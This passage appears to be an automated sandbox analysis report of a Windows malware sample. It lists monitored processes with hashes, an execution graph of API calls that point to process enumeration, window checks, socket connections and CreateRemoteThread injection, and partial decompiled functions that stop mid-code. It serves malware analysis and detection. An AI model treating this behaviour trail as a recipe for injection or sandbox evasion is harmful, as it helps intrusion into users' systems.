                                                        Commandline:C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Imagebase:0x980000
                                                        File size:138'800 bytes
                                                        MD5 hash:408995FA63F7BA3E059C8E32356B86C4
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:23
                                                        Start time:14:01:28
                                                        Start date:26/07/2023
                                                        Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Imagebase:0x980000
                                                        File size:138'800 bytes
                                                        MD5 hash:408995FA63F7BA3E059C8E32356B86C4
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:24
                                                        Start time:14:01:45
                                                        Start date:26/07/2023
                                                        Path:C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Program Files (x86)\autoit3\SciTE\SciTE.exe
                                                        Imagebase:0x400000
                                                        File size:1'256'960 bytes
                                                        MD5 hash:91EE39F4A80F60A938095424EEF2C709
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:Borland Delphi

                                                        General

                                                        Target ID:25
                                                        Start time:14:02:10
                                                        Start date:26/07/2023
                                                        Path:C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Program Files (x86)\autoit3\Examples\Helpfile\Extras\MyProg.exe
                                                        Imagebase:0x1000000
                                                        File size:2'560 bytes
                                                        MD5 hash:FE48113F3A78F980634E8CDACABF5091
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:Borland Delphi

                                                        General

                                                        Target ID:26
                                                        Start time:14:02:49
                                                        Start date:26/07/2023
                                                        Path:C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Program Files (x86)\common files\microsoft shared\MSInfo\msinfo32.exe
                                                        Imagebase:0xed0000
                                                        File size:337'920 bytes
                                                        MD5 hash:29F917BF3DE95D7CE5B6B38CB7A895AB
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:14.1%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:1%
                                                          Total number of Nodes:683
                                                          Total number of Limit Nodes:41
                                                          execution_graph 23537 452a24 23538 452a2c 23537->23538 23547 4517d0 23538->23547 23540 452aef 23551 450f4c 23540->23551 23542 452b1a 23555 4513f8 23542->23555 23544 452b2a 23567 451ab8 23544->23567 23546 452b53 23548 4517f9 23547->23548 23599 455148 23548->23599 23550 451818 23550->23540 23552 450f7a 23551->23552 23607 450e88 23552->23607 23554 450f89 23554->23542 23556 451400 23555->23556 23557 455148 RegCloseKey 23556->23557 23558 451448 23557->23558 23559 455148 RegCloseKey 23558->23559 23560 451480 23559->23560 23611 451258 23560->23611 23562 451498 23563 455148 RegCloseKey 23562->23563 23564 4514eb 23563->23564 23566 4515fc 23564->23566 23618 450f14 23564->23618 23566->23544 23568 451ac0 23567->23568 23568->23568 23570 451af1 23568->23570 23640 453918 23568->23640 23649 45c584 23570->23649 23572 451b23 23573 45c584 GetFileAttributesA 23572->23573 23588 451b35 23572->23588 23574 451b31 23573->23574 23575 45c584 GetFileAttributesA 23574->23575 23574->23588 23576 451b62 23575->23576 23577 45c584 GetFileAttributesA 23576->23577 23576->23588 23578 451b70 23577->23578 23579 45c584 GetFileAttributesA 23578->23579 23578->23588 23580 451ba1 23579->23580 23581 45c584 GetFileAttributesA 23580->23581 23580->23588 23582 451baf 23581->23582 23583 45c584 GetFileAttributesA 23582->23583 23582->23588 23584 451be0 23583->23584 23585 45c584 GetFileAttributesA 23584->23585 23584->23588 23586 451c48 23585->23586 23587 45c584 GetFileAttributesA 23586->23587 23586->23588 23589 451f65 23587->23589 23588->23546 23589->23588 23590 45c584 GetFileAttributesA 23589->23590 23591 451fde 23590->23591 23591->23588 23592 45c584 GetFileAttributesA 23591->23592 23593 45200f 23592->23593 23593->23588 23594 45c584 GetFileAttributesA 23593->23594 23595 452039 23594->23595 23595->23588 23596 45c584 GetFileAttributesA 23595->23596 23597 452067 23596->23597 23597->23588 23598 45c584 GetFileAttributesA 23597->23598 23598->23588 23602 455167 23599->23602 23601 4551f8 23601->23550 23603 45bd44 23602->23603 23604 45bd67 23603->23604 23605 45bd7c RegCloseKey 23604->23605 23606 45bd96 23605->23606 23606->23601 23608 450eab 23607->23608 23609 450ec5 GlobalMemoryStatusEx 23608->23609 23610 450edf 23609->23610 23610->23554 23612 451264 23611->23612 23613 451272 23611->23613 23612->23562 23622 45bf6c 23613->23622 23615 45127c 23616 45bf6c 2 API calls 23615->23616 23617 45128a 23615->23617 23616->23617 23617->23562 23619 450f25 23618->23619 23620 450e88 GlobalMemoryStatusEx 23619->23620 23621 450f33 23620->23621 23621->23566 23623 45bf7c 23622->23623 23625 45bf90 23623->23625 23626 45bef8 23623->23626 23625->23615 23627 45bf08 23626->23627 23632 45be58 23627->23632 23629 45bf35 23630 45bf49 23629->23630 23636 45afa4 23629->23636 23630->23625 23633 45be87 23632->23633 23634 45be9c CreateFileA 23633->23634 23635 45becb 23634->23635 23635->23629 23637 45afc7 23636->23637 23638 45afdc FindCloseChangeNotification 23637->23638 23639 45aff6 23638->23639 23639->23630 23653 432f64 23640->23653 23642 45394c 23657 432f84 23642->23657 23644 4539cc 23646 45afa4 FindCloseChangeNotification 23644->23646 23647 4539f5 23646->23647 23647->23570 23648 453983 23648->23644 23661 432fa4 23648->23661 23650 45c59b 23649->23650 23651 45c5d5 GetFileAttributesA 23650->23651 23652 45c5dd 23651->23652 23652->23572 23654 432f6f 23653->23654 23655 432f73 CreateToolhelp32Snapshot 23654->23655 23656 432f7e 23654->23656 23655->23642 23656->23642 23658 432f8f 23657->23658 23659 432f93 Process32First 23658->23659 23660 432f9e 23658->23660 23659->23648 23660->23648 23662 432faf 23661->23662 23663 432fb3 Process32Next 23662->23663 23664 432fbe 23662->23664 23663->23648 23664->23648 23665 45a730 23666 45a759 23665->23666 23667 45a78a LoadLibraryA 23666->23667 23668 45a79f 23667->23668 23669 431734 23670 431748 23669->23670 23675 42c96c 23670->23675 23672 431758 23673 43176f 23672->23673 23687 430358 23672->23687 23676 42c988 23675->23676 23685 42ca36 23676->23685 23697 42c63c 23676->23697 23678 42c9ea 23679 42ca06 23678->23679 23680 42c9fc 23678->23680 23678->23685 23709 428120 bind 23679->23709 23705 42c7d8 23680->23705 23683 42ca14 23710 42cc9c getsockname 23683->23710 23685->23672 23686 42ca27 23686->23685 23688 43036f 23687->23688 23689 43038e 23688->23689 23690 43039d 23688->23690 23737 4303fc 19 API calls 23689->23737 23692 4303a6 23690->23692 23693 4303b5 23690->23693 23738 430524 19 API calls 23692->23738 23722 42cab8 23693->23722 23696 43039b 23696->23673 23698 42c65b 23697->23698 23714 428480 11 API calls 23698->23714 23700 42c70a 23711 42c790 23700->23711 23704 42c72d 23704->23678 23707 42c80a 23705->23707 23706 42c864 23706->23679 23707->23706 23708 42c849 socket 23707->23708 23708->23706 23709->23683 23710->23686 23716 4286d8 23711->23716 23713 42c71c 23715 42c7b8 htons htons 23713->23715 23714->23700 23715->23704 23717 42870c 23716->23717 23718 428719 inet_ntoa 23717->23718 23720 428737 23717->23720 23719 42872b 23718->23719 23719->23713 23721 428773 getnameinfo 23720->23721 23721->23719 23723 42cad5 23722->23723 23724 42c63c 15 API calls 23723->23724 23725 42cafc 23724->23725 23726 42cb12 23725->23726 23727 42cb1c 23725->23727 23735 42cbb2 23725->23735 23730 42c7d8 socket 23726->23730 23728 42cb25 23727->23728 23729 42cb88 23727->23729 23739 42813c connect 23728->23739 23740 42813c connect 23729->23740 23730->23727 23733 42cba2 23733->23735 23741 42ccbc getsockname getpeername 23733->23741 23735->23696 23736 42cb3f 23736->23733 23737->23696 23738->23696 23739->23736 23740->23736 23741->23735 23742 40447c 23743 404484 23742->23743 23748 4044a6 23743->23748 23752 4467e4 23743->23752 23762 459e68 23743->23762 23766 447f08 23743->23766 23772 459940 23743->23772 23777 448f20 23743->23777 23786 43dd50 23743->23786 23797 43db80 23743->23797 23753 4467ec 23752->23753 23805 45283c 23753->23805 23761 44683b 23815 458324 FindCloseChangeNotification CreateFileA GetFileAttributesA WriteFile 23761->23815 23816 44aac8 FindCloseChangeNotification FindWindowA CreateFileA GetFileAttributesA WriteFile 23761->23816 23817 44a968 6 API calls 23761->23817 23818 444e38 6 API calls 23761->23818 23819 444618 8 API calls 23761->23819 23820 4448e0 FindCloseChangeNotification FindWindowA CreateFileA WriteFile 23761->23820 23763 459eac 23762->23763 23764 459ec5 SystemParametersInfoA 23763->23764 23765 459ec7 23764->23765 23770 447f20 23766->23770 23768 45bf6c FindCloseChangeNotification CreateFileA 23768->23770 23770->23768 23821 447844 23770->23821 23830 450ca4 RegCloseKey 23770->23830 23831 450d80 RegCloseKey 23770->23831 23773 45bf6c 2 API calls 23772->23773 23774 459968 23773->23774 23775 45998e 23774->23775 23834 45d240 23774->23834 23780 448f28 23777->23780 23778 45bf6c FindCloseChangeNotification CreateFileA 23778->23780 23779 45c058 FindCloseChangeNotification CreateFileA WriteFile 23779->23780 23780->23778 23780->23779 23781 44904d 23780->23781 23782 448fda 23780->23782 23857 448db0 FindCloseChangeNotification RegCloseKey CreateFileA GetFileAttributesA WriteFile 23781->23857 23856 448db0 FindCloseChangeNotification RegCloseKey CreateFileA GetFileAttributesA WriteFile 23782->23856 23785 448fdf 23785->23748 23787 43dd8c 23786->23787 23858 45b2e0 23787->23858 23789 43dda8 23790 45b2e0 FindWindowA 23789->23790 23791 43ddd3 23790->23791 23792 43dde5 23791->23792 23793 43de75 23791->23793 23796 43de5b 23792->23796 23862 44441c 23792->23862 23794 44441c GetFileAttributesA 23793->23794 23793->23796 23794->23796 23796->23748 23798 43dbb9 23797->23798 23799 45b2e0 FindWindowA 23798->23799 23800 43dbca 23799->23800 23803 43dbd6 23800->23803 23874 43d93c 23800->23874 23802 45b2e0 FindWindowA 23802->23803 23803->23802 23804 43d93c 8 API calls 23803->23804 23804->23803 23806 452844 23805->23806 23807 4517d0 RegCloseKey 23806->23807 23808 4528fe 23807->23808 23809 450f4c GlobalMemoryStatusEx 23808->23809 23810 452929 23809->23810 23811 4513f8 4 API calls 23810->23811 23812 452939 23811->23812 23813 451ab8 5 API calls 23812->23813 23814 452962 23813->23814 23814->23761 23815->23761 23816->23761 23817->23761 23818->23761 23819->23761 23820->23761 23822 44784c 23821->23822 23823 45c584 GetFileAttributesA 23822->23823 23829 4478ab 23822->23829 23824 447906 23823->23824 23825 447922 23824->23825 23826 447913 23824->23826 23824->23829 23833 45402c FindNextFileA 23825->23833 23832 45402c FindNextFileA 23826->23832 23829->23770 23830->23770 23831->23770 23832->23829 23833->23829 23835 45d252 23834->23835 23838 45d190 23835->23838 23837 45d26a 23837->23775 23839 45d1a6 23838->23839 23840 45bf6c 2 API calls 23839->23840 23841 45d1c3 23840->23841 23843 45d1e0 23841->23843 23844 45d0c0 23841->23844 23843->23837 23845 45d0d6 23844->23845 23846 45be58 CreateFileA 23845->23846 23847 45d116 23846->23847 23848 45d154 23847->23848 23852 45c954 23847->23852 23848->23843 23850 45d14d 23851 45afa4 FindCloseChangeNotification 23850->23851 23851->23848 23853 45c983 23852->23853 23854 45c998 ReadFile 23853->23854 23855 45c9bf 23854->23855 23855->23850 23856->23785 23857->23785 23859 45b306 23858->23859 23860 45b31b FindWindowA 23859->23860 23861 45b336 23860->23861 23861->23789 23863 444424 23862->23863 23865 44445c 23863->23865 23866 4559ec 23863->23866 23865->23796 23867 455a16 23866->23867 23868 45c584 GetFileAttributesA 23867->23868 23870 455a47 23868->23870 23869 45c584 GetFileAttributesA 23871 455a74 23869->23871 23870->23869 23872 45c584 GetFileAttributesA 23871->23872 23873 455a8d 23871->23873 23872->23873 23873->23865 23879 43d95e 23874->23879 23875 43d964 23888 456dc8 23875->23888 23876 458770 MapViewOfFile FindCloseChangeNotification GetFileAttributesA FindNextFileA 23876->23879 23878 43d97c 23878->23803 23879->23875 23879->23876 23879->23878 23881 4493cc 23879->23881 23885 4493e9 23881->23885 23882 4494f9 23883 43b08c 3 API calls 23882->23883 23884 4494e6 23883->23884 23884->23879 23885->23882 23886 4494d8 23885->23886 23909 43b08c 23886->23909 23889 456dd1 23888->23889 23892 456e71 23889->23892 23938 458d44 23889->23938 23891 45718f 23891->23878 23892->23891 23893 4573bb 23892->23893 23901 457036 23892->23901 23894 45740e 23893->23894 23895 45742b 23893->23895 23896 456dc8 5 API calls 23894->23896 23897 457434 23895->23897 23898 45745f 23895->23898 23896->23891 23899 456dc8 5 API calls 23897->23899 23898->23891 23900 4493cc 3 API calls 23898->23900 23899->23891 23900->23891 23901->23891 23902 457331 23901->23902 23903 45734e 23901->23903 23904 456dc8 5 API calls 23902->23904 23905 457357 23903->23905 23906 457382 23903->23906 23904->23891 23907 456dc8 5 API calls 23905->23907 23906->23891 23908 4493cc 3 API calls 23906->23908 23907->23891 23908->23891 23911 43b0a8 23909->23911 23910 43b177 23910->23884 23911->23910 23915 43b898 23911->23915 23913 43b13d 23913->23910 23919 43adbc 23913->23919 23916 43b8b7 23915->23916 23918 43ba37 23916->23918 23923 43b738 23916->23923 23918->23913 23920 43addb 23919->23920 23922 43ae85 23920->23922 23934 45cb08 23920->23934 23922->23910 23926 43b765 23923->23926 23924 43b86c 23924->23918 23926->23924 23927 43b3f0 GetExitCodeThread CreateRemoteThread 23926->23927 23928 43af60 23926->23928 23927->23926 23930 43af75 23928->23930 23929 43afeb 23929->23926 23930->23929 23931 43adbc CreateRemoteThread 23930->23931 23932 43afe2 23931->23932 23932->23929 23933 45afa4 FindCloseChangeNotification 23932->23933 23933->23929 23935 45cb37 23934->23935 23936 45cb4c CreateRemoteThread 23935->23936 23937 45cb7b 23936->23937 23937->23922 23943 458b40 GetPEB 23938->23943 23940 458d56 23944 4589f0 23940->23944 23942 458d5b 23942->23892 23943->23940 23945 458a11 23944->23945 23946 45c954 ReadFile 23945->23946 23947 458a57 23946->23947 23948 45afa4 FindCloseChangeNotification 23947->23948 23949 458b1c 23948->23949 23949->23942 23950 465398 23951 4653a0 23950->23951 23954 46549a 23951->23954 23978 4505d8 23951->23978 23953 4654e8 23955 45c584 GetFileAttributesA 23953->23955 23988 452764 23954->23988 23956 4654f2 23955->23956 23956->23954 23957 45bf6c 2 API calls 23956->23957 23958 465500 23957->23958 23958->23954 24024 45c058 23958->24024 23960 465574 23994 4559b4 23960->23994 23963 46557c 23964 45bf6c 2 API calls 23963->23964 23966 4655a9 23964->23966 23965 4559b4 GetFileAttributesA 23968 4655fe 23965->23968 23967 4559b4 GetFileAttributesA 23966->23967 23972 4655bf 23966->23972 23967->23972 23969 45bf6c 2 API calls 23968->23969 23970 465620 23969->23970 23971 4559b4 GetFileAttributesA 23970->23971 23975 46562c 23970->23975 23971->23975 23972->23965 23973 451ab8 5 API calls 23974 465668 23973->23974 23998 4626d0 23974->23998 23975->23973 23979 4505e0 23978->23979 23981 45064f 23979->23981 24030 4509a4 RegCloseKey 23979->24030 23983 45066f 23981->23983 24031 4507b0 RegCloseKey 23981->24031 23984 450f14 GlobalMemoryStatusEx 23983->23984 23986 4506c8 23983->23986 23984->23986 23985 45070b 23985->23953 23986->23985 24028 450548 GetDiskFreeSpaceExA 23986->24028 23989 45276c 23988->23989 23989->23989 23990 4513f8 4 API calls 23989->23990 23991 45278a 23990->23991 23992 4517d0 RegCloseKey 23991->23992 23993 45279d 23992->23993 23993->23960 23995 4559c3 23994->23995 23996 45c584 GetFileAttributesA 23995->23996 23997 4559ca 23996->23997 23997->23963 23999 4626d8 23998->23999 24032 44d950 23999->24032 24001 4627d8 24048 4618a0 24001->24048 24003 4627e2 24004 44441c GetFileAttributesA 24003->24004 24005 4627e7 24004->24005 24162 4625cc 24005->24162 24007 4627fc 24008 45bf6c 2 API calls 24007->24008 24012 462806 24008->24012 24009 45bf6c 2 API calls 24011 46287c 24009->24011 24010 45c584 GetFileAttributesA 24013 4628a9 24010->24013 24011->24010 24012->24009 24014 4628e8 24013->24014 24170 4485dc 24013->24170 24213 446fb8 24014->24213 24018 4448e0 FindCloseChangeNotification FindWindowA CreateFileA WriteFile 24023 4628f2 24018->24023 24019 4559ec GetFileAttributesA 24019->24023 24020 444618 8 API calls 24020->24023 24021 444e38 6 API calls 24021->24023 24022 45c058 3 API calls 24022->24023 24023->24018 24023->24019 24023->24020 24023->24021 24023->24022 24217 4406b8 FindCloseChangeNotification CreateFileA GetFileAttributesA WriteFile 24023->24217 24026 45c06d 24024->24026 24025 45c0a5 24025->23954 24026->24025 24318 45bfc4 24026->24318 24029 45056c 24028->24029 24029->23985 24030->23981 24031->23983 24033 44d958 24032->24033 24034 44d9d4 24033->24034 24035 4505d8 3 API calls 24033->24035 24036 4517d0 RegCloseKey 24034->24036 24035->24034 24037 44d9e1 24036->24037 24038 4559ec GetFileAttributesA 24037->24038 24039 44db75 24038->24039 24218 44d654 24039->24218 24041 44dbc6 24221 4480b8 24041->24221 24043 44dbdf 24047 44dc36 24043->24047 24257 44d1a4 24043->24257 24046 44dca7 24046->24001 24263 44c56c 24047->24263 24049 4618a8 24048->24049 24050 4618e2 24049->24050 24053 461a09 24049->24053 24051 45bf6c 2 API calls 24050->24051 24052 4618ee 24051->24052 24054 45d240 3 API calls 24052->24054 24056 461901 24052->24056 24055 461a2d 24053->24055 24057 461bd4 24053->24057 24054->24056 24058 45bf6c 2 API calls 24055->24058 24059 461969 24056->24059 24062 46192f 24056->24062 24161 461967 24057->24161 24285 45a6c0 GetFileAttributesA 24057->24285 24064 461a4d 24058->24064 24060 4559ec GetFileAttributesA 24059->24060 24061 461971 24060->24061 24068 45bf6c 2 API calls 24061->24068 24066 4559ec GetFileAttributesA 24062->24066 24067 45bf6c 2 API calls 24064->24067 24076 461a51 24064->24076 24065 461c00 24072 45bf6c 2 API calls 24065->24072 24070 46194e 24066->24070 24067->24076 24069 461989 24068->24069 24074 4559ec GetFileAttributesA 24069->24074 24069->24161 24078 45c058 3 API calls 24070->24078 24071 45bf6c 2 API calls 24073 461aaf 24071->24073 24075 461c18 24072->24075 24079 45d240 3 API calls 24073->24079 24073->24161 24077 461999 24074->24077 24080 45d240 3 API calls 24075->24080 24084 461d1b 24075->24084 24076->24071 24082 45d240 3 API calls 24077->24082 24078->24161 24079->24161 24081 461c2b 24080->24081 24083 4559b4 GetFileAttributesA 24081->24083 24091 4619b4 24082->24091 24087 461c3a 24083->24087 24085 461d49 24084->24085 24088 4559b4 GetFileAttributesA 24084->24088 24086 45bf6c 2 API calls 24085->24086 24093 461d64 24086->24093 24092 45c058 3 API calls 24087->24092 24088->24085 24089 461d8b 24090 45d240 3 API calls 24089->24090 24100 461db2 24090->24100 24096 45d240 3 API calls 24091->24096 24094 461c56 24092->24094 24093->24089 24095 45bf6c 2 API calls 24093->24095 24097 45d240 3 API calls 24094->24097 24095->24089 24096->24161 24098 461c72 24097->24098 24099 4559b4 GetFileAttributesA 24098->24099 24103 461c84 24099->24103 24101 45bf6c 2 API calls 24100->24101 24102 461df6 24101->24102 24105 461dfe 24102->24105 24110 461e86 24102->24110 24104 45c058 3 API calls 24103->24104 24106 461cb3 24104->24106 24108 45d240 3 API calls 24105->24108 24286 45a6c0 GetFileAttributesA 24106->24286 24113 461e38 24108->24113 24109 461cbe 24111 45d240 3 API calls 24109->24111 24112 45bf6c 2 API calls 24110->24112 24114 461cdf 24111->24114 24119 461ecb 24112->24119 24117 45d240 3 API calls 24113->24117 24115 4559b4 GetFileAttributesA 24114->24115 24116 461cf1 24115->24116 24122 45c058 3 API calls 24116->24122 24152 461e71 24117->24152 24118 45bf6c 2 API calls 24120 461f22 24118->24120 24121 45d240 3 API calls 24119->24121 24125 461eeb 24119->24125 24123 461f26 24120->24123 24124 461f5b 24120->24124 24121->24125 24126 461d0d 24122->24126 24128 45d240 3 API calls 24123->24128 24287 45a6c0 GetFileAttributesA 24124->24287 24125->24118 24130 45d240 3 API calls 24126->24130 24128->24152 24129 45bf6c 2 API calls 24135 462032 24129->24135 24130->24084 24131 461f66 24133 45bf6c 2 API calls 24131->24133 24132 462059 24134 45bf6c 2 API calls 24132->24134 24136 461f81 24133->24136 24137 462080 24134->24137 24135->24132 24138 45bf6c 2 API calls 24135->24138 24139 461f85 24136->24139 24140 461fd3 24136->24140 24141 46208f 24137->24141 24143 4559b4 GetFileAttributesA 24137->24143 24138->24132 24146 45d240 3 API calls 24139->24146 24145 4559b4 GetFileAttributesA 24140->24145 24142 45bf6c 2 API calls 24141->24142 24144 4620b0 24142->24144 24143->24141 24148 45d240 3 API calls 24144->24148 24153 4620b4 24144->24153 24147 461ff5 24145->24147 24149 461fa1 24146->24149 24151 4559b4 GetFileAttributesA 24147->24151 24148->24153 24288 45a6c0 GetFileAttributesA 24149->24288 24151->24152 24152->24129 24154 4559b4 GetFileAttributesA 24153->24154 24153->24161 24155 46216a 24154->24155 24156 45d240 3 API calls 24155->24156 24157 4621a9 24156->24157 24158 45d240 3 API calls 24157->24158 24159 462228 24157->24159 24158->24159 24160 45c058 3 API calls 24159->24160 24159->24161 24160->24161 24161->24003 24163 4626a5 24162->24163 24164 4625f1 24162->24164 24163->24007 24164->24163 24165 44441c GetFileAttributesA 24164->24165 24166 462604 24165->24166 24166->24163 24167 45bf6c 2 API calls 24166->24167 24168 46264a 24166->24168 24167->24168 24168->24163 24169 456dc8 5 API calls 24168->24169 24169->24163 24171 4485e4 24170->24171 24171->24171 24289 43f794 24171->24289 24173 448609 24174 4486a9 24173->24174 24176 448652 24173->24176 24175 4486cd 24174->24175 24180 448924 24174->24180 24178 45c584 GetFileAttributesA 24175->24178 24177 45c058 3 API calls 24176->24177 24208 4486a4 24177->24208 24189 4486e2 24178->24189 24179 45bf6c 2 API calls 24182 448b31 24179->24182 24181 45bf6c 2 API calls 24180->24181 24180->24208 24187 448965 24181->24187 24188 448748 24182->24188 24295 450ca4 RegCloseKey 24182->24295 24183 448a05 24185 4559b4 GetFileAttributesA 24183->24185 24186 448a3b 24185->24186 24190 45bf6c 2 API calls 24186->24190 24187->24183 24191 45c058 3 API calls 24187->24191 24188->24014 24189->24188 24194 45c058 3 API calls 24189->24194 24193 448a56 24190->24193 24192 44899b 24191->24192 24196 45c058 3 API calls 24192->24196 24195 4559b4 GetFileAttributesA 24193->24195 24193->24208 24198 4487bb 24194->24198 24201 448a69 24195->24201 24197 4489be 24196->24197 24199 448a07 24197->24199 24204 4489c7 24197->24204 24200 45bf6c 2 API calls 24198->24200 24212 44884f 24198->24212 24203 45c058 3 API calls 24199->24203 24207 4487fb 24200->24207 24202 4559b4 GetFileAttributesA 24201->24202 24209 448a8f 24202->24209 24203->24183 24206 45c058 3 API calls 24204->24206 24205 45c058 3 API calls 24205->24208 24206->24183 24210 45c058 3 API calls 24207->24210 24207->24212 24208->24179 24211 4559b4 GetFileAttributesA 24209->24211 24210->24212 24211->24208 24212->24205 24214 446fe9 24213->24214 24215 446fc3 24213->24215 24214->24023 24215->24214 24300 44fd94 24215->24300 24217->24023 24219 45bf6c 2 API calls 24218->24219 24220 44d663 24219->24220 24220->24041 24225 4480c0 24221->24225 24222 4484d7 24222->24043 24223 448452 24223->24222 24224 45d240 3 API calls 24223->24224 24224->24222 24225->24223 24226 45bf6c 2 API calls 24225->24226 24227 4481df 24226->24227 24228 45bf6c 2 API calls 24227->24228 24241 4481e3 24227->24241 24229 44822c 24228->24229 24229->24241 24267 45a6c0 GetFileAttributesA 24229->24267 24231 448255 24233 45bf6c 2 API calls 24231->24233 24232 45d240 3 API calls 24237 4482e0 24232->24237 24234 44826b 24233->24234 24235 44826f 24234->24235 24238 44828c 24234->24238 24268 45a6c0 GetFileAttributesA 24235->24268 24240 448454 24237->24240 24242 44831c 24237->24242 24239 45bf6c 2 API calls 24238->24239 24239->24241 24243 45bf6c 2 API calls 24240->24243 24241->24232 24244 45c584 GetFileAttributesA 24242->24244 24243->24223 24248 448340 24244->24248 24245 45bf6c 2 API calls 24246 448380 24245->24246 24247 45d240 3 API calls 24246->24247 24249 448391 24246->24249 24247->24249 24248->24245 24250 45bf6c 2 API calls 24249->24250 24251 4483d6 24250->24251 24252 45bf6c 2 API calls 24251->24252 24253 4483f8 24251->24253 24252->24253 24253->24223 24254 45c058 3 API calls 24253->24254 24255 448429 24254->24255 24256 45c058 3 API calls 24255->24256 24256->24223 24258 44d1ac 24257->24258 24258->24258 24259 45bf6c 2 API calls 24258->24259 24260 44d1d1 24259->24260 24262 44d205 24260->24262 24269 44d144 24260->24269 24262->24047 24264 44c574 24263->24264 24281 44c4ac 24264->24281 24266 44c733 24266->24046 24267->24231 24268->24241 24270 44d156 24269->24270 24277 44c308 24270->24277 24272 44d16e 24273 44d182 24272->24273 24274 44c56c 3 API calls 24272->24274 24273->24262 24275 44d178 24274->24275 24276 44c308 3 API calls 24275->24276 24276->24273 24278 44c31f 24277->24278 24279 45d240 3 API calls 24278->24279 24280 44c34b 24278->24280 24279->24280 24280->24272 24282 44c4c8 24281->24282 24283 45c058 3 API calls 24282->24283 24284 44c515 24283->24284 24284->24266 24285->24065 24286->24109 24287->24131 24288->24152 24290 43f7bc 24289->24290 24296 4558c0 24290->24296 24292 43f7c8 24293 45c584 GetFileAttributesA 24292->24293 24294 43f7de 24293->24294 24294->24173 24295->24188 24297 4558e8 24296->24297 24298 45c584 GetFileAttributesA 24297->24298 24299 455919 24298->24299 24299->24292 24301 44fdb5 24300->24301 24305 44fdfb 24300->24305 24302 451258 2 API calls 24301->24302 24301->24305 24303 44fdd1 24302->24303 24303->24305 24306 44fbe0 24303->24306 24305->24214 24307 44fbe8 24306->24307 24308 45bf6c 2 API calls 24307->24308 24309 44fc12 24308->24309 24310 45bf6c 2 API calls 24309->24310 24311 44fc40 24310->24311 24312 45bf6c 2 API calls 24311->24312 24313 44fc6e 24312->24313 24314 45bf6c 2 API calls 24313->24314 24315 44fc9c 24314->24315 24316 45bf6c 2 API calls 24315->24316 24317 44fcca 24316->24317 24317->24305 24320 45bfdd 24318->24320 24319 45c030 24319->24025 24320->24319 24321 45be58 CreateFileA 24320->24321 24322 45c010 24321->24322 24322->24319 24326 45c8bc 24322->24326 24324 45c029 24325 45afa4 FindCloseChangeNotification 24324->24325 24325->24319 24327 45c8eb 24326->24327 24328 45c900 WriteFile 24327->24328 24329 45c927 24328->24329 24329->24324

                                                          Executed Functions

                                                          Function 00450548 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00450548() {
				union _ULARGE_INTEGER _v8;
				intOrPtr _v12;
				union _ULARGE_INTEGER _v16;
				union _ULARGE_INTEGER _v24;
				int _t11;

				_t11 = GetDiskFreeSpaceExA("C:\",  &_v24,  &_v16,  &_v8); // executed
				if(_t11 == 0) {
					return 0x539;
				}
				return L004055DC(_v16.LowPart, _v12, 0x40000000, 0);
			}








                                                          0x00450566
                                                          0x0045056a
                                                          0x00000000
                                                          0x00450582
                                                          0x00000000

                                                          APIs
                                                          • GetDiskFreeSpaceExA.KERNELBASE(C:\,?,?,?), ref: 00450566
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: DiskFreeSpace
                                                          • String ID: C:\
                                                          • API String ID: 1705453755-3404278061
                                                          • Opcode ID: 7496b98025ce4f7b9d14c3b6795b5443bf8b9c250aacdadc338490ddbde4953b
                                                          • Instruction ID: db58301a327e31e3cbebd4ed348a9e37d6cd253c59348fca2cf526f75b404a74
                                                          • Opcode Fuzzy Hash: 7496b98025ce4f7b9d14c3b6795b5443bf8b9c250aacdadc338490ddbde4953b
                                                          • Instruction Fuzzy Hash: AFE01ABA204605ABD310DA18CC41F5B73D8AB84301FA44926BD51D7291EB74EE08CF9A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405D90 Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 38%
                                                          			E00405D90(intOrPtr __eax) {
				intOrPtr _v8;
				char _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				char _v28;
				char* _v32;
				char _v293;
				char* _t56;
				char _t63;
				char _t65;
				char _t68;
				char* _t69;
				char* _t70;
				char* _t73;
				char* _t75;
				char* _t78;
				char* _t84;
				char* _t90;
				char* _t95;
				char* _t98;
				intOrPtr _t103;
				void* _t112;
				void* _t114;
				intOrPtr _t115;

				_t112 = _t114;
				_t115 = _t114 + 0xfffffedc;
				_v8 = __eax;
				_push(0x105);
				_push( &_v293);
				_push(0);
				L0040126C();
				_v22 = 0;
				_t56 =  &_v12;
				_push(_t56);
				_push(0xf0019);
				_push(0);
				_push("Software\\Borland\\Locales");
				_push(0x80000001); // executed
				L004012C4(); // executed
				if(_t56 == 0) {
					L3:
					_push(_t112);
					_push(0x405e94);
					_push( *[fs:eax]);
					 *[fs:eax] = _t115;
					_v28 = 5;
					L00405BB8( &_v293, 0x105);
					_push( &_v28);
					_push( &_v22);
					_push(0);
